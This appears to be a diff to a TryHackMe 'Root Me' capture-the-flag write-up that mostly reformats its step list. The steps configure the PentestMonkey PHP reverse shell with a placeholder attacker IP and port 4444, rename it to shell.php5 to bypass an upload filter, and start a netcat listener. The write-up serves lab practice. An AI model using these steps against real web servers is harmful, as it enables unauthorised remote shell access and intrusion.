JeniferD29/ctf-writeups/TryHackMe/Root Me/README.md

 Website: http://pentestmonkey.net/tools/web-shells/php-reverse-shell

-Or I use Github
+Alternatively, the PHP reverse shell is also available on the official PentestMonkey GitHub repository.

 GitHub: https://github.com/pentestmonkey/php-reverse-shell

 Steps:
-step 1: Visit the PentestMonkey page. step 2: Download the php-reverse-shell.php file.
+Step 1: Visit the PentestMonkey page.
+Step 2: Download the php-reverse-shell.php file.

-step 3: Open it in Kali:
+Step 3: Open it in Kali:

        nano php-reverse-shell.php

-step 4: Modify these lines with your Kali/AttackBox IP and the port you want to listen on:
+Step 4: Modify these lines with your Kali/AttackBox IP and the port you want to listen on:

       $ip = 'YOUR_KALI_IP';
       $port = 4444;

-step 5: Save the file (Ctrl + O, Enter, Ctrl + X).
+Step 5: Save the file (Ctrl + O, Enter, Ctrl + X).

-step 6: Rename it to bypass the upload restriction:
+Step 6: Rename it to bypass the upload restriction:

       mv php-reverse-shell.php shell.php5

-step 7: Start a Netcat listener:
+Step 7: Start a Netcat listener:

       nc -lvnp 4444